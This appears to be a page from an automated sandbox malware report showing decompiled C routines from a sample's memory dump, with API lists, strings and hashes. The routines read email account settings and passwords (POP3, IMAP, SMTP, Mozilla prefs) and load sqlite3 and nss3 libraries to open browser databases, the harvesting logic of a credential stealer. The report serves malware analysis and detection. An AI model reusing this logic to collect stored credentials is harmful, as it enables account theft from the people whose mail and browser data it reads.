                                                                                                                                                                        						}
                                                                                                                                                                        						_t209 = _a8;
                                                                                                                                                                        						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
                                                                                                                                                                        							L29:
                                                                                                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
                                                                                                                                                                        								_v40 = _t211;
                                                                                                                                                                        								_t250 = strlen(_t211);
                                                                                                                                                                        								_t213 = strncmp(_v36, _v40, _t250);
                                                                                                                                                                        								_t256 = _t256 + 0x10;
                                                                                                                                                                        								if(_t213 == 0) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v8 = _v8 + 1;
                                                                                                                                                                        								if(_v8 < 0x5f) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t203 = _v13;
                                                                                                                                                                        								goto L33;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
                                                                                                                                                                        							_t231 = _t231 + 1;
                                                                                                                                                                        							_t254 = _t254 + _t250 + 1;
                                                                                                                                                                        							goto L43;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t128 = _t209 + 2; // 0x2
                                                                                                                                                                        						_t251 = _t254 + _t128;
                                                                                                                                                                        						_t237 =  *_t251;
                                                                                                                                                                        						if(_t237 == 0x78 || _t237 == 0x58) {
                                                                                                                                                                        							_t159 = _t209 + 3; // 0x3
                                                                                                                                                                        							_t245 = _t254 + _t159;
                                                                                                                                                                        							_t238 = _t245;
                                                                                                                                                                        							_t252 = 0;
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								_t216 =  *_t238;
                                                                                                                                                                        								if(_t216 == 0) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406541( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}
                                                                                                                                                                        0x00410447
                                                                                                                                                                        0x0041044a
                                                                                                                                                                        0x0041044f
                                                                                                                                                                        0x00410453
                                                                                                                                                                        0x00410458
                                                                                                                                                                        0x0041045f
                                                                                                                                                                        0x0041045f
                                                                                                                                                                        0x00410458
                                                                                                                                                                        0x00410461
                                                                                                                                                                        0x00410461
                                                                                                                                                                        0x0041047f
                                                                                                                                                                        0x00410480
                                                                                                                                                                        0x00410480
                                                                                                                                                                        0x00410487
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410487
                                                                                                                                                                        0x004102c6
                                                                                                                                                                        0x004102c9
                                                                                                                                                                        0x004102cc
                                                                                                                                                                        0x004102d0
                                                                                                                                                                        0x004102da
                                                                                                                                                                        0x004102e0
                                                                                                                                                                        0x004102e5
                                                                                                                                                                        0x004102ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004102ec
                                                                                                                                                                        0x004102f0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004102f2
                                                                                                                                                                        0x004102fa
                                                                                                                                                                        0x00410405
                                                                                                                                                                        0x00410405
                                                                                                                                                                        0x00410409
                                                                                                                                                                        0x0041040c
                                                                                                                                                                        0x00410414
                                                                                                                                                                        0x0041041c
                                                                                                                                                                        0x00410425
                                                                                                                                                                        0x0041042a
                                                                                                                                                                        0x0041042f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410431
                                                                                                                                                                        0x00410438
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041043a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041043a
                                                                                                                                                                        0x0041046e
                                                                                                                                                                        0x00410471
                                                                                                                                                                        0x00410472
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410472
                                                                                                                                                                        0x00410300
                                                                                                                                                                        0x00410300
                                                                                                                                                                        0x00410304
                                                                                                                                                                        0x00410309
                                                                                                                                                                        0x004103ba
                                                                                                                                                                        0x004103ba
                                                                                                                                                                        0x004103be
                                                                                                                                                                        0x004103c0
                                                                                                                                                                        0x004103cf
                                                                                                                                                                        0x004103cf
                                                                                                                                                                        0x004103d3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103c6
                                                                                                                                                                        0x004103d8
                                                                                                                                                                        0x004103da
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103e2
                                                                                                                                                                        0x004103eb
                                                                                                                                                                        0x004103f0
                                                                                                                                                                        0x004103f8
                                                                                                                                                                        0x004103fb
                                                                                                                                                                        0x004103fe
                                                                                                                                                                        0x004103ff
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103ff
                                                                                                                                                                        0x004103c8
                                                                                                                                                                        0x004103cc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103ce
                                                                                                                                                                        0x004103ce
                                                                                                                                                                        0x004103d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410318
                                                                                                                                                                        0x00410318
                                                                                                                                                                        0x0041031a
                                                                                                                                                                        0x00410340
                                                                                                                                                                        0x00410340
                                                                                                                                                                        0x00410344
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410337
                                                                                                                                                                        0x004103b5
                                                                                                                                                                        0x0041034a
                                                                                                                                                                        0x0041034e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041035c
                                                                                                                                                                        0x00410364
                                                                                                                                                                        0x0041036d
                                                                                                                                                                        0x00410372
                                                                                                                                                                        0x0041037d
                                                                                                                                                                        0x0041038c
                                                                                                                                                                        0x00410394
                                                                                                                                                                        0x00410395
                                                                                                                                                                        0x00410399
                                                                                                                                                                        0x004103a5
                                                                                                                                                                        0x004103ab
                                                                                                                                                                        0x004103ac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103ac
                                                                                                                                                                        0x00410339
                                                                                                                                                                        0x0041033d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041033f
                                                                                                                                                                        0x0041033f
                                                                                                                                                                        0x00410346
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410346
                                                                                                                                                                        0x00410309
                                                                                                                                                                        0x00410325
                                                                                                                                                                        0x0041032b
                                                                                                                                                                        0x0041032c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041032c
                                                                                                                                                                        0x00000000

APIs
• strlen.MSVCRT ref: 004102D0
• strncmp.MSVCRT(?,00414FF4,00000000,00414FF4,?,?,?), ref: 004102E0
• memcpy.MSVCRT ref: 0041035C
• atoi.MSVCRT ref: 0041036D
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00410399
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
• String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
• API String ID: 1895597112-3210201812
• Opcode ID: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
• Instruction ID: 0fafc75884cef128377fd64f4b7a28f8ddc93d47313dbc0ddeda27c5dc7f40ea
• Opcode Fuzzy Hash: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
• Instruction Fuzzy Hash: 6FF1D5B1805A98DEDF21CF94C9887DDBBB0BB85308F1481CAD5586B241C7B94AC9CF9D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 82%
E00410D67(void* __ecx, void* __edx) {
    void* __ebx;
    void* __edi;
    int _t58;
    int _t59;
    int _t60;
    int _t61;
    int _t63;
    void* _t96;
    void* _t99;
    void* _t102;
    void* _t105;
    void* _t108;
    void* _t111;
    void* _t114;
    void* _t117;
    void* _t123;
    void* _t194;
    void* _t196;
    void* _t201;
    char* _t202;

    _t194 = __edx;
    _t201 = __ecx;
    if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
        _t204 = _t201 + 0x460;
        E004060DA(0xff, _t201 + 0x870, E00406BA3( *(_t201 + 0x460)));
        _t123 = E00406BA3( *_t204);
        _t195 = _t201 + 0xf84;
        E004060DA(0xff, _t201 + 0xf84, _t123);
    }
    _t202 = _t201 + 0x46c;
    if(strcmp(_t202, "POP3_Server") == 0) {
        _t117 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
        _t195 = _t201 + 0x970;
        E004060DA(0xff, _t201 + 0x970, _t117);
    }
    if(strcmp(_t202, "IMAP_Server") == 0) {
        _t114 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
        _t195 = _t201 + 0x970;
        E004060DA(0xff, _t201 + 0x970, _t114);
    }
    if(strcmp(_t202, "NNTP_Server") == 0) {
        _t111 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
        _t195 = _t201 + 0x970;
        E004060DA(0xff, _t201 + 0x970, _t111);
    }
    if(strcmp(_t202, "SMTP_Server") == 0) {
        _t108 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
        _t195 = _t201 + 0x1084;
        E004060DA(0xff, _t201 + 0x1084, _t108);
    }
    if(strcmp(_t202, "POP3_User_Name") == 0) {
        _t105 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
        _t195 = _t201 + 0xb70;
        E004060DA(0xff, _t201 + 0xb70, _t105);
         *((intOrPtr*)(_t201 + 0xf70)) = 1;
    }
    if(strcmp(_t202, "IMAP_User_Name") == 0) {
        _t102 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
        _t195 = _t201 + 0xb70;
        E004060DA(0xff, _t201 + 0xb70, _t102);
         *((intOrPtr*)(_t201 + 0xf70)) = 2;
    }
    if(strcmp(_t202, "NNTP_User_Name") == 0) {
        _t99 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
        _t195 = _t201 + 0xb70;
        E004060DA(0xff, _t201 + 0xb70, _t99);
         *((intOrPtr*)(_t201 + 0xf70)) = 4;
    }
    if(strcmp(_t202, "SMTP_User_Name") == 0) {
        _t96 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
        _t195 = _t201 + 0x1284;
        E004060DA(0xff, _t201 + 0x1284, _t96);
         *((intOrPtr*)(_t201 + 0x1684)) = 3;
    }
    _t58 = strcmp(_t202, "POP3_Password2");
    _t214 = _t58;
    if(_t58 == 0) {
        E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
    }
    _t59 = strcmp(_t202, "IMAP_Password2");
    _t215 = _t59;
    if(_t59 == 0) {
        E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
    }
    _t60 = strcmp(_t202, "NNTP_Password2");
    _t216 = _t60;
    if(_t60 == 0) {
        E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
    }
    _t61 = strcmp(_t202, "SMTP_Password2");
    _t217 = _t61;
    if(_t61 == 0) {
        E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
    }
    if(strcmp(_t202, "NNTP_Email_Address") == 0) {
        E004060DA(0xff, _t201 + 0xe70, E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
    }
    _t63 = strcmp(_t202, "SMTP_Email_Address");
    if(_t63 == 0) {
        _t203 = _t201 + 0x460;
        E004060DA(0xff, _t201 + 0xe70, E00406BA3( *(_t201 + 0x460)));
        _t63 = E004060DA(0xff, _t201 + 0x1584, E00406BA3( *_t203));
    }
    _push("SMTP_Port");
    _t196 = _t201 + 0x46c;
    _push(_t196);
    L004120B4();
    if(_t63 == 0) {
        _t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
         *(_t201 + 0x168c) = _t63;
    }
    _push("NNTP_Port");
    _push(_t196);
    L004120B4();
    if(_t63 == 0) {
        L35:
        _t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
         *(_t201 + 0xf78) = _t63;
    } else {
        _push("IMAP_Port");
        _push(_t196);
        L004120B4();
        if(_t63 == 0) {
            goto L35;
        } else {
            _push("POP3_Port");
            _push(_t196);
            L004120B4();
            if(_t63 == 0) {
                goto L35;
            }
        }
    }
    _push("SMTP_Secure_Connection");
    _push(_t196);
    L004120B4();
    if(_t63 == 0) {
        _t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
         *(_t201 + 0x1690) = _t63;
    }
    _push("NNTP_Secure_Connection");
    _push(_t196);
    L004120B4();
    if(_t63 == 0) {
        L41:
         *((intOrPtr*)(_t201 + 0xf7c)) = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
    } else {
        _push("IMAP_Secure_Connection");
        _push(_t196);
        L004120B4();
        if(_t63 == 0) {
            goto L41;
        } else {
            _push("POP3_Secure_Connection");
            _push(_t196);
            L004120B4();
            if(_t63 == 0) {
                goto L41;
            }
        }
    }
    return 1;
}

Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Similarity
• API ID: strcmp$_stricmp$memcpystrlen
• String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
• API String ID: 1113949926-2499304436

C-Code - Quality: 74%

E0040C9AA(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
	signed int _v8;
	intOrPtr _v12;
	char _v16;
	void _v271;
	char _v272;
	void* __ebx;
	void* __edi;
	int _t64;
	int _t66;
	int _t68;
	int _t69;
	int _t72;
	int _t85;
	void* _t91;
	void* _t132;
	char* _t133;
	char* _t135;
	char* _t137;
	char* _t139;
	intOrPtr _t151;
	int _t153;
	int _t154;
	void* _t155;

	_t132 = __edx;
	_v12 = __ecx;
	_v272 = 0;
	memset( &_v271, 0, 0xff);
	_t133 = "mail.account.account";
	_t64 = strlen(_t133);
	_t148 = _t64;
	_t134 = _a4;
	if(strncmp(_a4, _t133, _t64) != 0) {
		_v8 = _v8 & 0x00000000;
	} else {
		_v8 = E0040C923(_t134,  &_v16, _t148);
	}
	if(_v8 != 0) {
		_push("identities");
		_push(_v8);
		L00412072();
		if(_t91 == 0) {
			_t17 = _t155 + 0x604; // 0x604
			E004060DA(0xff, _t17, _a8);
		}
	}
	_t135 = "mail.server";
	_t66 = strlen(_t135);
	_t149 = _t66;
	_t136 = _a4;
	if(strncmp(_a4, _t135, _t66) != 0) {
		_v8 = _v8 & 0x00000000;
	} else {
		_v8 = E0040C8CE(_t149, _t136,  &_v272);
	}
	if(_v8 != 0) {
		_t85 = E0040CC58(_v12 + 0xffffffe8, _t132,  &_v272);
		_push("username");
		_push(_v8);
		_t154 = _t85;
		L00412072();
		if(_t85 == 0) {
			_t28 = _t154 + 0x204; // 0x204
			_t85 = E004060DA(0xff, _t28, _a8);
		}
		_push("type");
		_push(_v8);
		L00412072();
		if(_t85 == 0) {
			_t31 = _t154 + 0x504; // 0x504
			_t85 = E004060DA(0xff, _t31, _a8);
		}
		_push("hostname");
		_push(_v8);
		L00412072();
		if(_t85 == 0) {
			_t34 = _t154 + 0x104; // 0x104
			_t85 = E004060DA(0xff, _t34, _a8);
		}
		_push("port");
		_push(_v8);
		L00412072();
		if(_t85 == 0) {
			_t85 = atoi(_a8);
			 *(_t154 + 0x804) = _t85;
		}
		_push("useSecAuth");
		_push(_v8);
		L00412072();
		if(_t85 == 0) {
			_push("true");
			_push(_a8);
			L00412072();
			if(_t85 == 0) {
				 *((intOrPtr*)(_t154 + 0x808)) = 1;
			}
		}
	}
	_t137 = "mail.identity";
	_t68 = strlen(_t137);
	_t150 = _t68;
	_t138 = _a4;
	_t69 = strncmp(_a4, _t137, _t68);
	if(_t69 != 0) {
		_v8 = _v8 & 0x00000000;
	} else {
		_t69 = E0040C8CE(_t150, _t138,  &_v272);
		_v8 = _t69;
	}
	if(_v8 != 0) {
		_t69 = E0040CC58(_v12 + 0xffffffe8, _t132,  &_v272);
		_push("useremail");
		_push(_v8);
		_t153 = _t69;
		L00412072();
		if(_t69 == 0) {
			_t51 = _t153 + 0x404; // 0x404
			_t69 = E004060DA(0xff, _t51, _a8);
		}
		_push("fullname");
		_push(_v8);
		L00412072();
		if(_t69 == 0) {
			_t54 = _t153 + 4; // 0x4
			_t69 = E004060DA(0xff, _t54, _a8);
		}
	}
	_push("signon.signonfilename");
	_push(_a4);
	L00412072();
	if(_t69 == 0) {
		_t151 = _v12;
		_t139 = _t151 + 0x245;
		_t152 = _t151 + 0x140;
		_t72 = strlen(_t151 + 0x140);
		_t60 = strlen(_a8) + 1; // 0x1
		if(_t72 + _t60 >= 0x104) {
			 *_t139 = 0;
		} else {
			E004062B7(_t139, _t152, _a8);
		}
	}
	return 1;
}
                                                                                                                                                                        0x0040caf7
                                                                                                                                                                        0x0040caf8
                                                                                                                                                                        0x0040cafd
                                                                                                                                                                        0x0040cb00
                                                                                                                                                                        0x0040cb09
                                                                                                                                                                        0x0040cb0e
                                                                                                                                                                        0x0040cb14
                                                                                                                                                                        0x0040cb19
                                                                                                                                                                        0x0040cb1a
                                                                                                                                                                        0x0040cb1f
                                                                                                                                                                        0x0040cb22
                                                                                                                                                                        0x0040cb2b
                                                                                                                                                                        0x0040cb30
                                                                                                                                                                        0x0040cb36
                                                                                                                                                                        0x0040cb36
                                                                                                                                                                        0x0040cb3c
                                                                                                                                                                        0x0040cb41
                                                                                                                                                                        0x0040cb44
                                                                                                                                                                        0x0040cb4d
                                                                                                                                                                        0x0040cb4f
                                                                                                                                                                        0x0040cb54
                                                                                                                                                                        0x0040cb57
                                                                                                                                                                        0x0040cb60
                                                                                                                                                                        0x0040cb62
                                                                                                                                                                        0x0040cb62
                                                                                                                                                                        0x0040cb60
                                                                                                                                                                        0x0040cb4d
                                                                                                                                                                        0x0040cb6c
                                                                                                                                                                        0x0040cb72
                                                                                                                                                                        0x0040cb77
                                                                                                                                                                        0x0040cb7b
                                                                                                                                                                        0x0040cb7f
                                                                                                                                                                        0x0040cb89
                                                                                                                                                                        0x0040cb9e
                                                                                                                                                                        0x0040cb8b
                                                                                                                                                                        0x0040cb94
                                                                                                                                                                        0x0040cb99
                                                                                                                                                                        0x0040cb99
                                                                                                                                                                        0x0040cba6
                                                                                                                                                                        0x0040cbb5
                                                                                                                                                                        0x0040cbba
                                                                                                                                                                        0x0040cbbf
                                                                                                                                                                        0x0040cbc2
                                                                                                                                                                        0x0040cbc4
                                                                                                                                                                        0x0040cbcd
                                                                                                                                                                        0x0040cbd2
                                                                                                                                                                        0x0040cbd8
                                                                                                                                                                        0x0040cbdd
                                                                                                                                                                        0x0040cbde
                                                                                                                                                                        0x0040cbe3
                                                                                                                                                                        0x0040cbe6
                                                                                                                                                                        0x0040cbef
                                                                                                                                                                        0x0040cbf4
                                                                                                                                                                        0x0040cbf7
                                                                                                                                                                        0x0040cbfc
                                                                                                                                                                        0x0040cbef
                                                                                                                                                                        0x0040cbfd
                                                                                                                                                                        0x0040cc02
                                                                                                                                                                        0x0040cc05
                                                                                                                                                                        0x0040cc0e
                                                                                                                                                                        0x0040cc10
                                                                                                                                                                        0x0040cc13
                                                                                                                                                                        0x0040cc19
                                                                                                                                                                        0x0040cc20
                                                                                                                                                                        0x0040cc2f
                                                                                                                                                                        0x0040cc3a
                                                                                                                                                                        0x0040cc4b
                                                                                                                                                                        0x0040cc3c
                                                                                                                                                                        0x0040cc42
                                                                                                                                                                        0x0040cc48
                                                                                                                                                                        0x0040cc3a
                                                                                                                                                                        0x0040cc55

APIs
• memset.MSVCRT ref: 0040C9CF
• strlen.MSVCRT ref: 0040C9DA
• strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C9E7
• _stricmp.MSVCRT(00000000,server), ref: 0040CA24
• _stricmp.MSVCRT(00000000,identities), ref: 0040CA46
• strlen.MSVCRT ref: 0040CA66
• strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040CA73
• _stricmp.MSVCRT(00000000,username,00000000), ref: 0040CABC
• _stricmp.MSVCRT(00000000,type,00000000), ref: 0040CADE
• _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040CB00
• _stricmp.MSVCRT(00000000,port,00000000), ref: 0040CB22
• atoi.MSVCRT ref: 0040CB30
  • Part of subcall function 0040C923: memset.MSVCRT ref: 0040C959
  • Part of subcall function 0040C923: memcpy.MSVCRT ref: 0040C97B
  • Part of subcall function 0040C923: atoi.MSVCRT ref: 0040C98F
• _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040CB44
• _stricmp.MSVCRT(?,true,00000000), ref: 0040CB57
• strlen.MSVCRT ref: 0040CB72
• strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040CB7F
• _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040CBC4
• _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CBE6
• _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CC05
• strlen.MSVCRT ref: 0040CC20
• strlen.MSVCRT ref: 0040CC2A
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
• String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
• API String ID: 736090197-593045482
• Opcode ID: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
• Instruction ID: 863115145772795da6afe78a2776049e9b2399cf567c3eb7605af69a2dd2c254
• Opcode Fuzzy Hash: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
• Instruction Fuzzy Hash: 4F71C432504209FEEB10EB61DD42BDE77A5DF50328F20426BF945B21D1EB7CAE919A4C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040FCBC(intOrPtr* __esi, char* _a4) {
	void _v283;
	char _v284;
	void _v547;
	char _v548;
	struct HINSTANCE__* _t49;
	struct HINSTANCE__* _t50;
	struct HINSTANCE__* _t61;
	void* _t70;
	struct HINSTANCE__* _t74;
	CHAR* _t91;
	intOrPtr* _t93;
	void* _t94;
	void* _t95;
	void* _t96;

	_t93 = __esi;
	if( *((intOrPtr*)(__esi + 0x24)) != 0) {
		L16:
		return 1;
	}
	_v284 = 0;
	memset( &_v283, 0, 0x117);
	_t95 = _t94 + 0xc;
	if(_a4 == 0) {
		E0040FAA6( &_v284);
	} else {
		strcpy( &_v284, _a4);
	}
	if(_v284 == 0) {
		_t91 = "sqlite3.dll";
		_t49 = GetModuleHandleA(_t91);
		 *(_t93 + 0x24) = _t49;
		if(_t49 != 0) {
			goto L14;
		}
		_t61 = LoadLibraryA(_t91);
		goto L13;
	} else {
		_v548 = 0;
		memset( &_v547, 0, 0x104);
		strcpy( &_v548,  &_v284);
		strcat( &_v284, "\\sqlite3.dll");
		_t70 = E00406155( &_v284);
		_t96 = _t95 + 0x20;
		if(_t70 == 0) {
			strcpy( &_v284,  &_v548);
			strcat( &_v284, "\\mozsqlite3.dll");
			_t96 = _t96 + 0x10;
		}
		if(E00406155( &_v284) == 0) {
                                                                                                                                                                        						strcpy( &_v284,  &_v548);
                                                                                                                                                                        						strcat( &_v284, "\\nss3.dll");
                                                                                                                                                                        					}
                                                                                                                                                                        					_t74 = GetModuleHandleA( &_v284);
                                                                                                                                                                        					 *(_t93 + 0x24) = _t74;
                                                                                                                                                                        					if(_t74 != 0) {
                                                                                                                                                                        						L14:
                                                                                                                                                                        						_t50 =  *(_t93 + 0x24);
                                                                                                                                                                        						if(_t50 == 0) {
                                                                                                                                                                        							return 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *_t93 = GetProcAddress(_t50, "sqlite3_open");
                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 4)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_prepare");
                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 8)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_step");
                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_text");
                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_int");
                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x14)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_int64");
                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x18)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_finalize");
                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x1c)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_close");
                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_exec");
                                                                                                                                                                        						goto L16;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t61 = LoadLibraryExA( &_v284, 0, 8);
                                                                                                                                                                        						L13:
                                                                                                                                                                        						 *(_t93 + 0x24) = _t61;
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}

